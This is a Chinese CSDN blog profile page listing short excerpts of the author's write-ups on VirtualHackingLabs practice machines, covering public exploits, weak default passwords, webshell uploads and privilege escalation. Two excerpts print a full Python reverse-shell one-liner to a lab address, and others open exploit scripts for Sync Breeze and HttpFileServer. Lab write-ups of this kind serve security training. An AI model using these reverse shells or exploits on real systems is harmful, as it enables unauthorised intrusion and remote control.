4 菜浪马废

尚未进行身份认证

我要认证

等级
TA的排名 8w+

virtualhackinglabs靶机 JAMES 10.12.1.95

修改一下脚本

2020-10-29 22:16:39

virtualhackinglabs靶机 CMS01 10.12.1.177

#!/usr/bin/pythonfrom __future__ import print_functionimport requestsimport sysimport reimport argparseimport base64import osimport randomimport timetry: # Python 2.6-2.7 from HTMLParser import HTMLParserexcept ImportError: # Python 3 ...

2020-10-24 20:08:47

virtualhackinglabs靶机 BREEZE 10.12.1.124

#!/usr/bin/pythonprint "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"#Author website: www.tulpa-security.com#Author twitter: @tulpa_security#Exploit will land you NT AUTHORITY\SYSTE...

2020-10-24 14:46:05

aaron

#!/usr/bin/env python# Exploit Title: HttpFileServer 2.3.x Remote Command Execution# Google Dork: intext:"httpfileserver 2.3"# Date: 04-01-2016# Remote: Yes# Exploit Author: Avinash Kumar Thapa aka "-Acid"# Vendor Homepage: http://rejetto.com/...

2020-10-22 17:57:20

virtualhackinglabs靶机 John 10.12.1.83

第一种:ms17-010第二种:ms08-067cve2019-0708好像也可以利用懒得写了

2020-10-22 15:24:45

virtualhackinglabs靶机 AS45 10.12.1.109

有远程命令执行漏洞

2020-10-22 14:48:22

virtualhackinglabs靶机 MANTIS 10.12.1.74

看一看密码重置的漏洞得到了webshell晚上再写吧下午上课

2020-10-21 13:17:49

virtualhackinglabs靶机 android 10.12.1.48

完成

2020-10-20 22:43:45

virtualhackinglabs靶机 STEVEN 10.12.1.36

弱密码admin:admin有命令执行漏洞不用msf的话

2020-10-20 20:57:55

virtualhackinglabs靶机 ANTHONY 10.12.1.113

两种方法第一种方法(ms17-010)得到了NAS的凭证第二中方法

2020-10-19 22:09:05

virtualhackinglabs靶机 NAS 10.12.1.121

字符串是密钥

2020-10-19 21:50:11

virtualhackinglabs靶机 PBX01 10.12.1.117

弱密码admin:adminpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.2.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'拿w..

2020-10-19 11:39:22

virtualhackinglabs靶机 REACT 10.12.1.188

找到了文件算了算了写不动了今天写了6台了吧实在写不动了明天再说

2020-10-18 21:31:18

virtualhackinglabs靶机 FW01 10.12.1.200

需要密码admin:admin弱密码猜解成功有漏洞脚本地址验证成功得到webshell直接切换用户root:root弱密码得到权限

2020-10-18 20:17:18

virtualhackinglabs靶机 RTR-VHL-01 10.12.2.240

搜一下版本漏洞漏洞脚本地址应该算做完了吧官网的最后一个提示是在FTP中查看key.txt文件就算做完了吧这台机器好没意思

2020-10-18 19:42:37

virtualhackinglabs靶机 PBX 10.12.1.17

wordpress用wpscan扫描一下

2020-10-18 16:44:47

virtualhackinglabs靶机 NATURAL 10.12.1.77

80端口找到文件上传上传.php文件需要抓包修改一下参数就可以绕过了得到webshell/binbackdoor很可疑下载到本地分析看了半天还是不会提权

2020-10-18 15:47:29

virtualhackinglabs靶机 Core 10.12.1.160

tomcat:s3cret直接登录进来了接下来上传文件拿到webshell现在考虑提权的问题linpeas.sh跑了一下发现/usr/lib/pt_chown —> GNU_glibc_2.1/2.1.1_-6(08-1999)利用失败利用失败

2020-10-18 14:19:23

virtualhackinglabs靶机 DOLPHIN 10.12.1.58

VHL提示了是dolphin的RCE40756.py完成之前卡在web-dev卡了好久下把那个往后放一放先刷别的靶机

2020-10-17 19:57:01

virtualhackinglabs靶机 VPS1723 10.12.1.53

ftp有远程命令执行漏洞脚本python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.2.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'执行命令..

2020-10-17 16:58:31

查看更多

勋章 我的勋章
  • 签到达人
    签到达人
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 新人勋章
    新人勋章
    用户发布第一条blink获赞超过3个即可获得
  • 阅读者勋章Lv2
    阅读者勋章Lv2
    授予在CSDN APP累计阅读博文达到7天的你,是你的坚持与努力,使你超越了昨天的自己。
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 1024勋章
    1024勋章
    #1024程序员节#活动勋章,当日发布原创博客即可获得
  • 勤写标兵Lv4
    勤写标兵Lv4
    授予每个自然周发布9篇以上(包括9篇)原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 学习力
    学习力
    《原力计划【第二季】》第一期主题勋章 ,第一期活动已经结束啦,小伙伴们可以去参加第二期打卡挑战活动获取更多勋章哦。
  • 原力新人
    原力新人
    在《原力计划【第二季】》打卡挑战活动中,成功参与本活动并发布一篇原创文章的博主,即可获得此勋章。
  • 原力探索 · S
    原力探索 · S
    在《原力计划【第二季】》打卡挑战活动中,发布 12 篇原创文章参与活动的博主,即可获得此勋章。(本次活动结束后统一统计发放)
  • 分享学徒
    分享学徒
    成功上传1个资源即可获取